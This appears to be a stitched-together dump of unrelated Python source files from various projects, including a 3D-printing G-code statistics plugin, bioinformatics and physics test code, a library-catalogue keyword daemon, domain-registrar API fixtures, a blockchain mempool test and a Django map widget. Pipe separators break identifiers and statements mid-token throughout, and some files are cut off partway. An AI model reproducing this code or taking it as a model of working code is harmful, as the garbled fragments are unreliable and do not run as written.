Volume extruded is 9.1 cc.
Meta
Text has 33738 lines and a size of 1239.0 KB.
Version is 11.09.28
Procedures
carve
bottom
preface
inset
fill
multiply
speed
temperature
raft
skirt
dimension
bookend
Profile
UM-PLA-HighQuality
Slice
Edge width is 0.72 mm.
Layer height is 0.4 mm.
"""
from __future__ import absolute_import
#Init has to be imported first because it has code to workaround the python bug where relative imports don't work if the module is imported as a main module.
import __init__
from fabmetheus_utilities.vector3 import Vector3
from fabmetheus_utilities import archive
from fabmetheus_utilities import euclidean
from fabmetheus_utilities import gcodec
from fabmetheus_utilities import settings
from skeinforge_application.skeinforge_utilities import skeinforge_polyfile
from skeinforge_application.skeinforge_utilities import skeinforge_profile
import cStringIO
import math
import sys
__author__ = 'Enrique Perez (perez_enrique@yahoo.com)'
__date__ = '$Date: 2008/21/04 $'
__license__ = 'GNU Affero General Public License http://www.gnu.org/licenses/agpl.html'
def getNewRepository():
'Get new repository.'
return StatisticRepository()
def getWindowAnalyzeFile(fileName):
"Write statistics for a gcode file."
return getWindowAnalyzeFileGivenText( fileName, archive.getFileText(fileName) )
def getWindowAnalyzeFileGivenText( fileName, gcodeText, repository=None):
"Write statistics for a gcode file."
print('')
print('')
print('Statistics are being generated for the file ' + archive.getSummarizedFileName(fileName) )
if repository == None:
repository = settings.getReadRepository( StatisticRepository() )
skein = StatisticSkein()
statisticGcode = skein.getCraftedGcode(gcodeText, repository)
if repository.printStatistics.value:
print(statisticGcode)
if repository.saveStatistics.value:
archive.writeFileMessageEnd('.txt', fileName, statisticGcode, 'The statistics file is saved as ')
def writeOutput(fileName, fileNamePenultimate, fileNameSuffix, filePenultimateWritten, gcodeText=''):
"Write statistics for a skeinforge gcode file, if 'Write Statistics File for Skeinforge Chain' is selected."
repository = settings.getReadRepository( StatisticRepository() )
if gcodeText == '':
gcodeText = archive.getFileText( fileNameSuffix )
if repository.activateStatistic.value:
getWindowAnalyzeFileGivenText( fileNameSuffix, gcodeText, repository )
class StatisticRepository:
"A class to handle the statistics settings."
def __init__(self):
"Set the default settings, execute title & settings fileName."
skeinforge_profile.addListsToCraftTypeRepository('skeinforge_application.skeinforge_plugins.analyze_plugins.statistic.html', self)
self.openWikiManualHelpPage = settings.HelpPage().getOpenFromAbsolute('http://fabmetheus.crsndoo.com/wiki/ | index.php/Skeinforge_Statistic')
self.activateStatistic = settings.BooleanSetting().getFromValue('Activate Statistic', self, True )
settings.LabelSeparator().getFromRepository(self)
settings.LabelDisplay().getFromName('- Cost -', self )
self.machineTime = settings.FloatSpin().getFromValue( 0.0, 'Machine Time ($/hour):', self, 5.0, 1.0 )
self.material = settings.FloatSpin | ().getFromValue( 0.0, 'Material ($/kg):', self, 40.0, 20.0 )
settings.LabelSeparator().getFromRepository(self)
self.density = settings.FloatSpin().getFromValue( 500.0, 'Density (kg/m3):', self, 2000.0, 930.0 )
self.fileNameInput = settings.FileNameInput().getFromFileName( [ ('Gcode text files', '*.gcode') ], 'Open File to Generate Statistics for', self, '')
self.printStatistics = settings.BooleanSetting().getFromValue('Print Statistics', self, True )
self.saveStatistics = settings.BooleanSetting().getFromValue('Save Statistics', self, False )
self.executeTitle = 'Generate Statistics'
def execute(self):
"Write button has been clicked."
fileNames = skeinforge_polyfile.getFileOrGcodeDirectory( self.fileNameInput.value, self.fileNameInput.wasCancelled, ['_comment'] )
for fileName in fileNames:
getWindowAnalyzeFile(fileName)
class StatisticSkein:
"A class to get statistics for a gcode skein."
def __init__(self):
self.extrusionDiameter = None
self.oldLocation = None
self.operatingFeedRatePerSecond = None
self.output = cStringIO.StringIO()
self.profileName = None
self.version = None
self.volumeFraction = None
def addLine(self, line):
"Add a line of text and a newline to the output."
self.output.write(line + '\n')
def addToPath(self, location):
"Add a point to travel and maybe extrusion."
if self.oldLocation != None:
travel = location.distance( self.oldLocation )
if self.feedRateMinute > 0.0:
self.totalBuildTime += 60.0 * travel / self.feedRateMinute
self.totalDistanceTraveled += travel
if self.extruderActive:
self.totalDistanceExtruded += travel
self.cornerMaximum.maximize(location)
self.cornerMinimum.minimize(location)
self.oldLocation = location
def extruderSet( self, active ):
"Maybe increment the number of times the extruder was toggled."
if self.extruderActive != active:
self.extruderToggled += 1
self.extruderActive = active
def getCraftedGcode(self, gcodeText, repository):
"Parse gcode text and store the statistics."
self.absoluteEdgeWidth = 0.4
self.characters = 0
self.cornerMaximum = Vector3(-987654321.0, -987654321.0, -987654321.0)
self.cornerMinimum = Vector3(987654321.0, 987654321.0, 987654321.0)
self.extruderActive = False
self.extruderSpeed = None
self.extruderToggled = 0
self.feedRateMinute = 600.0
self.filamentDiameter = 3.0
self.layerHeight = 0.4
self.numberOfLines = 0
self.procedures = []
self.repository = repository
self.totalBuildTime = 0.0
self.totalDistanceExtruded = 0.0
self.totalDistanceTraveled = 0.0
lines = archive.getTextLines(gcodeText)
for line in li |
jason-neal/companion_simulations | tests/utilities/test_spectrum_utils.py | Python | mit | 1,224 | 0.000817 | import os
import numpy as np
import pytest
from spectrum_overload import Spectrum
from mingle.utilities.spectrum_utils import load_spectrum, select_observation
@pytest.mark.parametrize("fname", ["HD30501-1-mixavg-tellcorr_1.fits", "HD30501-1-mixavg-h2otellcorr_1.fits"])
def test_load_spectrum(fname):
fname = os.path.join("tests", "testdata", "handy_spectra", fname)
results = load_spectrum(fname)
assert isinstance(results, Spectrum)
assert results.header["OBJECT"].upper() == "HD30501"
assert np.all(results.xaxis > 2110) # nm
assert np.all(results.xaxis < 2130) # nm
assert np.all(results.flux < 2)
assert np.all(results.flux >= 0)
def test_load_no_filename_fits():
"""Not a valid file."""
with pytest.raises(ValueError):
load_spectrum("")
@pytest.mark.parametrize("chip", [0, None, 5, 42])
def test_select_observation_with_bad_chip(chip):
with pytest.raises(ValueError):
select_observa | tion("HD30501", "1", chip)
@pytest.mark.xfail()
de | f test_spectrum_plotter(spectra, label=None, show=False):
"""Plot a Spectrum object."""
assert False
@pytest.mark.xfail()
def test_plot_spectra(obs, model):
"""Plot two spectra."""
assert False
|
zuosc/PythonCode | OOP/subclass.py | Python | mit | 378 | 0.002717 | # !/usr/bin/env python3
# _*_ coding:utf8 _*_
# Power by zuosc 2016-10-23
'su | bclass demo 继承和多态'
class Animal(object):
def run(self):
print('Animal is running......')
class Dog(Animal):
def run(self):
print('Dog is running.....')
def eat(self):
print('dog | is eating......')
class Cat(Animal):
pass
dog = Dog()
dog.run() |
yohell/msaview | msaview_plugin_disopred/__init__.py | Python | mit | 4,493 | 0.004229 | """MSAView - Disopred support.
Copyright (c) 2011 Joel Hedlund.
Contact: Joel Hedlund <yohell@ifm.liu.se>
MSAView is a modular, configurable and extensible package for analysing and
visualising multiple sequence alignments and sequence features.
This package provides support for parsing dispored result files (must be
named according to sequence id, e.g: O43736.disopred).
If you have problems with this package, please contact the author.
Copyright
=========
The MIT License
Copyright (c) 2011 Joel Hedlund.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substa | ntial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OT | HER DEALINGS IN
THE SOFTWARE.
"""
__version__ = "0.9.0"
import os
from msaview import action
from msaview.options import Option
from msaview.features import (SequenceFeature,
make_regions,
map_region_to_msa)
class DisopredPrediction(object):
def __init__(self, sequence_id=None, sequence=None, regions=None):
self.sequence_id = sequence_id
self.sequence = sequence
if regions is None:
regions = []
self.regions = regions
@classmethod
def from_file(cls, f, sequence_id=None):
if sequence_id is None:
sequence_id = os.path.splitext(os.path.basename(f.name))[0]
sequence = []
prediction = []
for line in f:
words = line.split()
if len(words) != 2:
continue
linetype = words[0].lower()
if linetype == 'aa:':
sequence.append(words[1])
elif linetype == 'pred:':
prediction.append(words[1])
regions = make_regions(''.join(prediction), '*')
return cls(sequence_id, sequence=''.join(sequence), regions=regions)
class ImportDisopredRegions(action.Action):
action_name = 'import-disopred-predictions'
path = ['Import', 'Sequence features', 'Disopred predictions for sequence']
tooltip = 'Import predictions of natively disordered regions from a disopred result file.'
@classmethod
def applicable(cls, target, coord=None):
if target.msaview_classname != 'data.msa':
return
if not coord or not coord.sequence:
return
return cls(target, coord)
def get_options(self):
location = ''
if self.target:
if self.target.path:
location = os.path.dirname(self.target.path)
location = os.path.join(location, self.target.ids[self.coord.sequence] + '.disopred')
return [Option(None, 'location', location, location, 'Location', 'Disopred prediction file to load.')]
def run(self):
f = open(self.params['location'])
prediction = DisopredPrediction.from_file(f)
f.close()
if not prediction:
return
sequence_index = self.coord.sequence
offset = prediction.sequence.find(self.target.unaligned[sequence_index])
if offset < 0:
return
msa_positions = self.target.msa_positions[sequence_index]
sequence_id = self.target.ids[sequence_index]
features = []
for region in prediction.regions:
mapping = map_region_to_msa(region, msa_positions, offset)
if not mapping:
continue
features.append(SequenceFeature(sequence_index, sequence_id, 'disopred', 'natively disordered', region, mapping))
self.target.features.add_features(features)
action.register_action(ImportDisopredRegions)
|
Panos512/invenio | modules/bibclassify/lib/bibclassify_daemon.py | Python | gpl-2.0 | 15,602 | 0.006858 | # -*- coding: utf-8 -*-
##
## This file is part of Invenio.
## Copyright (C) 2007, 2008, 2009, 2010, 2011 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""
BibClassify daemon.
FIXME: the code below requires collection table to be updated to add column:
clsMETHOD_fk mediumint(9) unsigned NOT NULL,
This is not clean and should be fixed.
This module IS NOT standalone safe - it should never be run so.
"""
import sys
import time
import os
from invenio import bibclassify_config as bconfig
from invenio import bibclassify_text_extractor
from invenio import bibclassify_engine
from invenio import bibclassify_webinterface
from invenio import bibtask
from invenio.dbquery import run_sql
from invenio.intbitset import intbitset
from invenio.search_engine import get_collection_reclist
from invenio.bibdocfile import BibRecDocs
# Global variables allowing to retain the progress of the task.
_INDEX = 0
_RECIDS_NUMBER = 0
## INTERFACE
def bibclassify_daemon():
"""Constructs the BibClassify bibtask."""
bibtask.task_init(authorization_action='runbibclassify',
authorization_msg="BibClassify Task Submission",
description="Extract keywords and create a BibUpload "
"task.\nExamples:\n"
" $ bibclassify\n"
" $ bibclassify -i 79 -k HEP\n"
" $ bibclassify -c 'Articles' -k HEP\n",
help_specific_usage=" -i, --recid\t\tkeywords are extracted from "
"this record\n"
" -c, --collection\t\tkeywords are extracted from this collection\n"
" -k, --taxonomy\t\tkeywords are based on that reference",
version="Invenio BibClassify v%s" % bconfig.VERSION,
specific_params=("i:c:k:f",
[
"recid=",
"collection=",
"taxonomy=",
"force"
]),
task_submit_elaborate_specific_parameter_fnc=
_task_submit_elaborate_specific_parameter,
task_submit_check_options_fnc=_task_submit_check_options,
task_run_fnc=_task_run_core)
## PRIVATE METHODS
def _ontology_exists(ontology_name):
"""Check if the ontology name is registered in the database."""
if run_sql("SELECT name FROM clsMETHOD WHERE name=%s",
(ontology_name,)):
return True
return False
def _collection_exists(collection_name):
"""Check if the collection name is registered in the database."""
if run_sql("SELECT name FROM collection WHERE name=%s",
(collection_name,)):
return True
return False
def _recid_exists(recid):
"""Check if the recid number is registered in the database."""
if run_sql("SELECT id FROM bibrec WHERE id=%s",
(recid,)):
return True
return False
def _get_recids_foreach_ontology(recids=None, collections=None, taxonomy=None):
"""Returns an array containing hash objects containing the
collection, its corresponding ontology and the re | cords belonging to
the given collection."""
rec_onts = []
# User specified record IDs.
if recids:
rec_onts.append({
'ontology': taxonomy,
'collection': None,
'recIDs': recids,
})
return rec_onts
# User specified collections.
if collections:
for collection in collections:
records = get_collection_reclist(collection)
if records:
| rec_onts.append({
'ontology': taxonomy,
'collection': collection,
'recIDs': records
})
return rec_onts
# Use rules found in collection_clsMETHOD.
result = run_sql("SELECT clsMETHOD.name, clsMETHOD.last_updated, "
"collection.name FROM clsMETHOD JOIN collection_clsMETHOD ON "
"clsMETHOD.id=id_clsMETHOD JOIN collection ON "
"id_collection=collection.id")
for ontology, date_last_run, collection in result:
records = get_collection_reclist(collection)
if records:
if not date_last_run:
bibtask.write_message("INFO: Collection %s has not been previously "
"analyzed." % collection, stream=sys.stderr, verbose=3)
modified_records = intbitset(run_sql("SELECT id FROM bibrec"))
elif bibtask.task_get_option('force'):
bibtask.write_message("INFO: Analysis is forced for collection %s." %
collection, stream=sys.stderr, verbose=3)
modified_records = intbitset(run_sql("SELECT id FROM bibrec"))
else:
modified_records = bibtask.get_modified_records_since(date_last_run)
records &= modified_records
if records:
rec_onts.append({
'ontology': ontology,
'collection': collection,
'recIDs': records
})
else:
bibtask.write_message("WARNING: All records from collection '%s' have "
"already been analyzed for keywords with ontology '%s' "
"on %s." % (collection, ontology, date_last_run),
stream=sys.stderr, verbose=2)
else:
bibtask.write_message("ERROR: Collection '%s' doesn't contain any record. "
"Cannot analyse keywords." % (collection,),
stream=sys.stderr, verbose=0)
return rec_onts
def _update_date_of_last_run(runtime):
"""Update bibclassify daemon table information about last run time."""
run_sql("UPDATE clsMETHOD SET last_updated=%s", (runtime,))
def _task_submit_elaborate_specific_parameter(key, value, opts, args):
"""Given the string key it checks it's meaning, eventually using the
value. Usually it fills some key in the options dict.
It must return True if it has elaborated the key, False, if it doesn't
know that key.
eg:
if key in ('-n', '--number'):
bibtask.task_get_option(\1) = value
return True
return False
"""
# Recid option
if key in ("-i", "--recid"):
try:
value = int(value)
except ValueError:
bibtask.write_message("The value specified for --recid must be a "
"valid integer, not '%s'." % value, stream=sys.stderr,
verbose=0)
if not _recid_exists(value):
bibtask.write_message("ERROR: '%s' is not a valid record ID." % value,
stream=sys.stderr, verbose=0)
return False
recids = bibtask.task_get_option('recids')
if recids is None:
recids = []
recids.append(value)
bibtask.task_set_option('recids', recids)
# Collection option
elif key in ("-c", "--collection"):
if not _collection_exists(value):
bibtask.write_message("ERROR: '%s' is not a valid collection." % value,
stream=sys.stderr, verbose=0)
return False
collections = bibtask.task_get_option("collections")
collections = collections or []
collections.append(value)
bibtask.task_set_option("collections", collections)
# Taxonomy option
elif key in ("-k", "--taxonomy"):
if not _ontology_exists(value):
bibtask.write_message("ERROR: '%s' is not a valid taxonomy name." % value,
stream=sys.stderr, verbose=0)
return False
bibtask.task_set_option("taxonomy", value)
elif key in ("-f", "--force"):
|
grigouze/gandi.cli | gandi/cli/tests/fixtures/_operation.py | Python | gpl-3.0 | 5,786 | 0 | try:
# python3
from xmlrpc.client import DateTime
except ImportError:
# python2
from xmlrpclib import DateTime
type_list = list
def list(options):
ret = [{'date_created': DateTime('20150915T18:29:16'),
'date_start': None,
'date_updated': DateTime('20150915T18:29:17'),
'errortype': None,
'eta': -1863666,
'id': 100100,
'cert_id': None,
'infos': {'extras': {},
'id': '',
'label': 'iheartcli.com',
'product_action': 'renew',
'product_name': 'com',
'product_type': 'domain',
'quantity': ''},
'last_error': None,
'params': {'auth_id': 99999999,
'current_year': 2015,
'domain': 'iheartcli.com',
'domain_id': 1234567,
'duration': 1,
'param_type': 'domain',
'remote_addr': '127.0.0.1',
'session_id': 2920674,
'tld': 'com',
'tracker_id': '621cb9f4-472d-4cc1-b4b9-b18cc61e2914'},
'session_id': 2920674,
'source': 'PXP561-GANDI',
'step': 'BILL',
'type': 'domain_renew'},
{'date_created': DateTime('20150505T00:00:00'),
'date_start': None,
'date_updated': DateTime('20150505T00:00:00'),
'errortype': None,
'eta': 0,
'id': 100200,
'cert_id': None,
'infos': {'extras': {},
'id': '',
'label': '',
'product_action': 'billing_prepaid_add_money',
'product_name': '',
| 'product_type': 'corporate',
'quantity': ''},
'la | st_error': None,
'params': {'amount': 50.0,
'auth_id': 99999999,
'param_type': 'prepaid_add_money',
'prepaid_id': 100000,
'remote_addr': '127.0.0.1',
'tracker_id': 'ab0e5e67-6ca7-4afc-8311-f20080f15cf1'},
'session_id': 9844958,
'source': 'PXP561-GANDI',
'step': 'BILL',
'type': 'billing_prepaid_add_money'},
{'step': 'RUN',
'cert_id': 710,
'id': 100300,
'type': 'certificate_update',
'params': {'cert_id': 710,
'param_type': 'certificate_update',
'prepaid_id': 100000,
'inner_step': 'comodo_oper_updated',
'dcv_method': 'email',
'csr': '-----BEGIN CERTIFICATE REQUEST-----'
'MIICxjCCAa4CAQAwgYAxCzAJBgNVBAYTAkZSMQsw'
'0eWfyJJTOypoToCtdGoye507GOsgIysfRWaExay5'
'-----END CERTIFICATE REQUEST-----',
'remote_addr': '127.0.0.1'}},
{'step': 'RUN',
'cert_id': 706,
'id': 100302,
'type': 'certificate_update',
'params': {'cert_id': 706,
'param_type': 'certificate_update',
'prepaid_id': 100000,
'inner_step': 'comodo_oper_updated',
'dcv_method': 'dns',
'csr': '-----BEGIN CERTIFICATE REQUEST-----'
'MIICxjCCAa4CAQAwgYAxCzAJBgNVBAYTAkZSMQsw'
'0eWfyJJTOypoToCtdGoye507GOsgIysfRWaExay5'
'-----END CERTIFICATE REQUEST-----',
'remote_addr': '127.0.0.1'}},
{'step': 'WAIT',
'cert_id': 701,
'id': 100303,
'type': 'certificate_update',
'params': {'cert_id': 706,
'param_type': 'certificate_update',
'prepaid_id': 100000,
'inner_step': 'check_email_sent',
'dcv_method': 'dns',
'remote_addr': '127.0.0.1'}},
{'step': 'RUN',
'id': 99001,
'vm_id': 152967,
'type': 'hosting_migration_vm',
'params': {'inner_step': 'wait_sync'}},
{'step': 'RUN',
'id': 99002,
'vm_id': 152966,
'type': 'hosting_migration_vm',
'params': {'inner_step': 'wait_finalize'}},
]
options.pop('sort_by', None)
options.pop('items_per_page', None)
def compare(op, option):
if isinstance(option, (type_list, tuple)):
return op in option
return op == option
for fkey in options:
ret = [op for op in ret if compare(op.get(fkey), options[fkey])]
return ret
def info(id):
if id == 200:
return {'step': 'DONE'}
if id == 300:
return {'step': 'DONE', 'vm_id': 9000}
if id == 400:
return {'step': 'DONE'}
if id == 600:
return {'step': 'DONE', 'type': 'certificate_update',
'params': {'cert_id': 710,
'param_type': 'certificate_update',
'prepaid_id': 100000,
'remote_addr': '127.0.0.1'}}
if id == 9900:
return {'step': 'DONE',
'type': 'hosting_migration_disk',
'params': {'to_dc_id': 3,
'from_dc_id': 1,
'inner_step': 'wait_finalize'},
'id': 9900}
return [oper for oper in list({}) if oper['id'] == id][0]
|
smarr/RTruffleSOM | src/som/interpreter/ast/nodes/specialized/to_do_node.py | Python | mit | 3,664 | 0.003821 | from rpython.rlib import jit
from ..expression_node import ExpressionNode
from .....vmobjects.block_ast import AstBlock
from .....vmobjects.double import Double
from .....vmobjects.integer import Integer
from .....vmobjects.method_ast import AstMethod
class AbstractToDoNode(ExpressionNode):
_immutable_fields_ = ['_rcvr_expr?', '_limit_expr?', '_body_expr?',
'_universe']
_child_nodes_ = ['_rcvr_expr', '_limit_expr', '_body_expr']
def __init__(self, rcvr_expr, limit_expr, body_expr, universe,
source_section = None):
ExpressionNode.__init__(self, source_section)
self._rcvr_expr = self.adopt_child(rcvr_expr)
self._limit_expr = self.adopt_child(limit_expr)
self._body_expr = self.adopt_child(body_expr)
self._universe = universe
def execute(self, frame):
rcvr = self._rcvr_expr.execute(frame)
limit = self._limit_expr.execute(frame)
body = self._body_expr.execute(frame)
self._do_loop(rcvr, limit, body)
return rcvr
def execute_evaluated(self, frame, rcvr, args):
self._do_loop(rcvr, args[0], args[1])
return rcvr
def get_printable_location(block_method):
assert isinstance(block_method, AstMethod)
return "#to:do: %s" % block_method.merge_point_string()
int_driver = jit.JitDriver(
greens=['block_method'],
reds='auto',
is_recursive=True,
# virtualizables=['frame'],
get_printable_location=get_printable_location)
class IntToIntDoNode(AbstractToDoNode):
def _do_loop(self, rcvr, limit, body_block):
block_met | hod | = body_block.get_method()
i = rcvr.get_embedded_integer()
top = limit.get_embedded_integer()
while i <= top:
int_driver.jit_merge_point(block_method = block_method)
block_method.invoke(body_block, [self._universe.new_integer(i)])
i += 1
@staticmethod
def can_specialize(selector, rcvr, args, node):
return (isinstance(args[0], Integer) and isinstance(rcvr, Integer) and
len(args) > 1 and isinstance(args[1], AstBlock) and
selector.get_embedded_string() == "to:do:")
@staticmethod
def specialize_node(selector, rcvr, args, node):
return node.replace(
IntToIntDoNode(node._rcvr_expr, node._arg_exprs[0],
node._arg_exprs[1], node._universe,
node._source_section))
double_driver = jit.JitDriver(
greens=['block_method'],
reds='auto',
is_recursive=True,
# virtualizables=['frame'],
get_printable_location=get_printable_location)
class IntToDoubleDoNode(AbstractToDoNode):
def _do_loop(self, rcvr, limit, body_block):
block_method = body_block.get_method()
i = rcvr.get_embedded_integer()
top = limit.get_embedded_double()
while i <= top:
double_driver.jit_merge_point(block_method = block_method)
block_method.invoke(body_block, [self._universe.new_integer(i)])
i += 1
@staticmethod
def can_specialize(selector, rcvr, args, node):
return (isinstance(args[0], Double) and isinstance(rcvr, Integer) and
len(args) > 1 and isinstance(args[1], AstBlock) and
selector.get_embedded_string() == "to:do:")
@staticmethod
def specialize_node(selector, rcvr, args, node):
return node.replace(
IntToDoubleDoNode(node._rcvr_expr, node._arg_exprs[0],
node._arg_exprs[1], node._universe,
node._source_section))
|
syscoin/syscoin | test/functional/mempool_resurrect.py | Python | mit | 2,589 | 0.001931 | #!/usr/bin/env python3
# Copyright (c) 2014-2021 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test resurrection of mined transactions when the blockchain is re-organized."""
from test_framework.blocktools import COINBASE_MATURITY
from test_framework.test_framework import SyscoinTestFramework
from test_framework.util import assert_equal
from test_framework.wallet import MiniWallet
class MempoolCoinbaseTest(SyscoinTestFramework):
def set_test_params(self):
self.num_nodes = 1
self.setup_clean_chain = True
def run_test(self):
node = self.nodes[0]
wallet = MiniWallet(node)
# Add enough mature utxos to the wallet so that all txs spend confirmed coins
self.generate(wallet, 3)
self.generate(node, COINBASE_MATURITY)
| # Spend block 1/2/3's coinbase transactions
# Mine a block
# Create three more transactions, spen | ding the spends
# Mine another block
# ... make sure all the transactions are confirmed
# Invalidate both blocks
# ... make sure all the transactions are put back in the mempool
# Mine a new block
# ... make sure all the transactions are confirmed again
blocks = []
spends1_ids = [wallet.send_self_transfer(from_node=node)['txid'] for _ in range(3)]
blocks.extend(self.generate(node, 1))
spends2_ids = [wallet.send_self_transfer(from_node=node)['txid'] for _ in range(3)]
blocks.extend(self.generate(node, 1))
spends_ids = set(spends1_ids + spends2_ids)
# mempool should be empty, all txns confirmed
assert_equal(set(node.getrawmempool()), set())
confirmed_txns = set(node.getblock(blocks[0])['tx'] + node.getblock(blocks[1])['tx'])
# Checks that all spend txns are contained in the mined blocks
assert spends_ids < confirmed_txns
# Use invalidateblock to re-org back
node.invalidateblock(blocks[0])
# All txns should be back in mempool with 0 confirmations
assert_equal(set(node.getrawmempool()), spends_ids)
# Generate another block, they should all get mined
blocks = self.generate(node, 1)
# mempool should be empty, all txns confirmed
assert_equal(set(node.getrawmempool()), set())
confirmed_txns = set(node.getblock(blocks[0])['tx'])
assert spends_ids < confirmed_txns
if __name__ == '__main__':
MempoolCoinbaseTest().main()
|
joke2k/faker | faker/utils/datasets.py | Python | mit | 535 | 0 | import operator
from collections import Counter
from functools import reduce
from typing import Dict, Tuple
def add_dicts(*args: Tuple[Dict, ...]) -> Dict:
"""
Adds two or more dicts together. Common keys will have their values added.
| For example::
>>> t1 = {'a':1, 'b':2}
>>> t2 = {'b':1, 'c':3}
>>> t3 = {'d':4}
>>> add_dicts(t1, t2, t3)
{'a': 1, 'c': 3, 'b': 3, | 'd': 4}
"""
counters = [Counter(arg) for arg in args]
return dict(reduce(operator.add, counters))
|
davidam/python-examples | nlp/ethnicolr/ethnicolr-example.py | Python | gpl-3.0 | 339 | 0 | #!/usr/bi | n/python
# -*- coding: utf-8 -*-
import pan | das as pd
from ethnicolr import census_ln, pred_census_ln
names = [{'name': 'smith'},
{'name': 'zhang'},
{'name': 'jackson'}]
df = pd.DataFrame(names)
print(df)
print(census_ln(df, 'name'))
print(census_ln(df, 'name', 2010))
print(pred_census_ln(df, 'name'))
|
Kromey/akwriters | api/utils.py | Python | mit | 1,500 | 0.001333 | import json
from django.http import HttpResponse
from django.utils.cache import add_never_cache_headers
class ApiResponse(HttpResponse):
"""JSON-encoded API response
I've arbitrarily decided that the API uses JSON responses. To ease the
encoding process and to ensure that the correct Content-Type is set, this
object simply takes an encodable data object and returns an HttpResponse
object that properly encapsulates it as JSON.
"""
def __init__(self, data):
"""Build a JSON-encoded API response."""
jdata = json.dumps(data, separators=(',', ':'))
super().__init__(jdata, content_type="application/json")
def apimethod(method):
"""Decorator for an API method to properly handle encoding API responses | .
The decorated method is expected to return a Python object that can be
encoded into JSON; it will then be magically transformed into one that
returns properly-encoded JSON."""
def wrapper(*args, **kwargs):
data = {
"meta": {
| "status": "OK",
},
"response": {}
}
try:
data["response"] = method(*args, **kwargs)
except Exception as e:
data["meta"]["status"] = "ERR"
data["meta"]["error"] = str(e)
response = ApiResponse(data)
# Ensure API responses are never cached
add_never_cache_headers(response)
return response
return wrapper
|
oscarmcm/django-places | places/widgets.py | Python | mit | 1,789 | 0 | # -*- coding: utf-8 -*-
from django.forms import widgets
from django.template.loader import render_to_string
from django.utils.translation import gettext_lazy as _
from .conf import settings
class PlacesWidget(widgets.MultiWidget):
template_name = 'places/widgets/places.html'
def __init__(self, attrs=None):
_widgets = (
widgets.TextInput(
attrs={'data-geo': 'formatted_address', 'data-id': 'map_place'}
),
widgets.TextInput(
attrs={
'data-geo': 'lat',
'data-id': 'map_latitude',
'placeholder': _('Latitude'),
}
),
widgets.TextInput(
attrs={
'data-geo': 'lng',
'data-id': 'map_longitude',
'placeholder': _('Longitude'),
}
),
)
super(PlacesWidget, self).__init__(_widgets, attrs)
def decompress(self, value):
if isinstance(value, str):
return value.rsplit(',')
if value:
return [value.place, value.latitude, value.longitude]
return [None, None]
def get_context(self, name, value, attrs):
context = super(PlacesWidget, self).get_context(name, value, attrs)
context['map_widget_height'] = settings.MAP_WIDGET_HEIGHT
context['map_options'] = settings.MAP_OPTIONS
context['marker_options'] = settings.MARKER_OPTIONS
return context
class Media:
js = (
'//maps.googleapis.com/maps/api/js?key={}&li | braries=places'.format(
settings.MAPS_API_KEY
),
'places/places.js',
)
| css = {'all': ('places/places.css',)}
|
joshrule/LOTlib | LOTlib/Inference/GrammarInference/SimpleGrammarHypothesis.py | Python | gpl-3.0 | 3,106 | 0.009981 | import numpy as np
from copy import deepcopy
from scipy.misc import logsumexp
from scipy.stats import binom
from LOTlib.Miscellaneous import sample1, self_update
from LOTlib.Hypotheses.Stochastics import *
class SimpleGrammarHypothesis(Hypothesis):
"""
A simple example of grammar inference that *only* fits grammar parameters. Not intended for real use.
"""
def __init__(self, Counts, L, GroupLength, prior_offset, Nyes, Ntrials, ModelResponse, value=None):
"""
Counts - nonterminal -> #h x #rules counts
Hypotheses - #h
L - group -> #h x 1 array
GroupLength - #groups (vector) - contains the number of trials per group
Nyes - #item ( #item = sum(GroupLength))
Ntrials - #item
ModelResponse - #h x #item - each hypothesis' response to the i'th item (1 or 0)
"""
assert sum(GroupLength) == len(Nyes) == len(Ntrial | s)
L = numpy.array(L)
self_update(self,locals())
self.N_groups = len(GroupLength)
self.nts = Counts.keys() # all nonterminals
self.nrules = { nt: Counts[nt].shape[1] for nt in self.nts} # number of rules for each nonterminal
self.N_hyps = Counts[self.nts[0]].s | hape[0]
if value is None:
value = { nt: GibbsDirchlet(alpha=np.ones(self.nrules[nt]), proposal_scale=1000.) for nt in self.nts }
Hypothesis.__init__(self, value=value) # sets the value
@attrmem('likelihood')
def compute_likelihood(self, data, **kwargs):
# The likelihood of the human data
assert len(data) == 0
# compute each hypothesis' prior, fixed over all data
priors = np.ones(self.N_hyps) * self.prior_offset # #h x 1 vector
for nt in self.nts: # sum over all nonterminals
priors = priors + np.dot(np.log(self.value[nt].value), self.Counts[nt].T)
priors = priors - np.log(sum(np.exp(priors)))
pos = 0 # what response are we on?
likelihood = 0.0
for g in xrange(self.N_groups):
posteriors = self.L[g] + priors # posterior score
posteriors = np.exp(posteriors - logsumexp(posteriors)) # posterior probability
# Now compute the probability of the human data
for _ in xrange(self.GroupLength[g]):
ps = np.dot(posteriors, self.ModelResponse[pos])
likelihood += binom.logpmf(self.Nyes[pos], self.Ntrials[pos], ps)
pos = pos + 1
return likelihood
@attrmem('prior')
def compute_prior(self):
return sum([ x.compute_prior() for x in self.value.values()])
def propose(self, epsilon=1e-10):
# should return is f-b, proposal
prop = type(self)(self.Counts, self.L, self.GroupLength, self.prior_offset, self.Nyes, \
self.Ntrials, self.ModelResponse, value=deepcopy(self.value))
fb = 0.0
nt = sample1(self.nts) # which do we propose to?
